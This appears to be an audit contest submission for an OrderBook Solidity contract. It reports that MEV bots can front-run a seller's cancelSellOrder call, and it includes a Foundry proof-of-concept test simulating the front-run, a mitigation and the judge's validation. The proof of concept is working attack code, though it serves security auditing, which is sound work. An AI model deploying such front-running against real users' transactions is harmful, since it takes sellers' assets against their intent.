OrderBook

First Flight #43

Beginner FriendlySolidity

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

🛡️ MEV Bots can front-run the transaction to buy the assets when Seller No longer wants to sell the assets ,When seller calls `OrderBook::cancelSellOrder`

yashkhare9815

MEV Bots can front-run the transaction to buy the assests when sell no longer wants to sell,When seller calls `OrderBook::cancelSellOrder`

Description

Normally a seller can cancel his sell order by calling the OrderBook::cancelSellOrder function to make his request order inactive and get his assets back, But Mev bots can scan the cancel tx form the mempool and buy the assets by front-running cnacel tx , resulting the cancel tx reverting and order being sold even if seller does not want to sell it.

Risk

Likelihood:

Reason 1 : Whenever a seller calls the cancelSellOrder function and increase the price of the assests.

Impact:

Impact 1: Sellernot able to cancel the order and get his assets back
Impact 2:Order is sold , when seller no longer wants to sell his assets

Proof of Concept

MevBotAttack contract is made to simulate the bot front running the cancel txn request , it can be added within TestOrderBook.t.sol file.
Test_MevAttackOnCancelSellOrder can be added to existing suitcase in which alice creates the order, than goes to cancel it but mev bot scan the txn in mempool and front-run to buy the assets.

MevBotAttack Contract

//@audit add following MevBotContract in TestOrderBook.t.sol

contract MevBotAttack is Test {

OrderBook public book;

address public usdcHolder;

constructor(OrderBook _book) {

book = _book;

}

function mevBuyOrderInMempool(uint256 orderId) external {

// simulate mempool bot that front-runs amend by buying before it

book.iUSDC().approve(address(book), type(uint256).max);

book.buyOrder(orderId);

}

//@ Test_MevBotAttackOnCancelSellOrder

function test_MevAttackOnCancelSellOrder() public {

// Step 1: Alice creates a sell order

vm.startPrank(alice);

wbtc.approve(address(book), 2e8);

uint256 orderId = book.createSellOrder(

address(wbtc),

2e8,

180_000e6,

2 days

);

vm.stopPrank();

// Step 2: Deploy and fund MEV bot

MevBotAttack mevBot = new MevBotAttack(book);

vm.startPrank(dan);

usdc.transfer(address(mevBot), 200_000e6);

vm.stopPrank();

// From the mempool, mev bot can scan the txn and frint-run the cancel order, such that seller cannot retrive his assets.

// Step 3: MEV bot buys the order from mempool before cancel

mevBot.mevBuyOrderInMempool(orderId);

// Step 4: Alice tries to cancel the sell order

vm.expectRevert(OrderBook.OrderAlreadyInactive.selector);

vm.prank(alice);

book.cancelSellOrder(orderId);

// Step 5: Assert the outcome

assert(wbtc.balanceOf(address(mevBot)) == 2e8); // bot has asset

assert(usdc.balanceOf(alice) == 174_600e6); // got paid old price minus fee

assert(book.totalFees() == 5_400e6); // 3% fee

}

Recommended Mitigation

Use safe rpc api endpoints like FlashBot rpc to make your transaction invisible from the mev bots.

Updates

Lead Judging Commences

yeahchibyke Lead Judge 10 days ago

Submission Judgement Published

Validated

Assigned finding tags:

Amends or cancellation of sell orders can be front-run

When a seller wants to amend or cancel their sell orders, a malicious entity can front-run their transactions and buy out the orders. This can be especially harmful when real-world prices of listed assets fluctuate and sellers want to adjust the prices listed in their orders.

Rewards breakdown

nSLOC

217

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.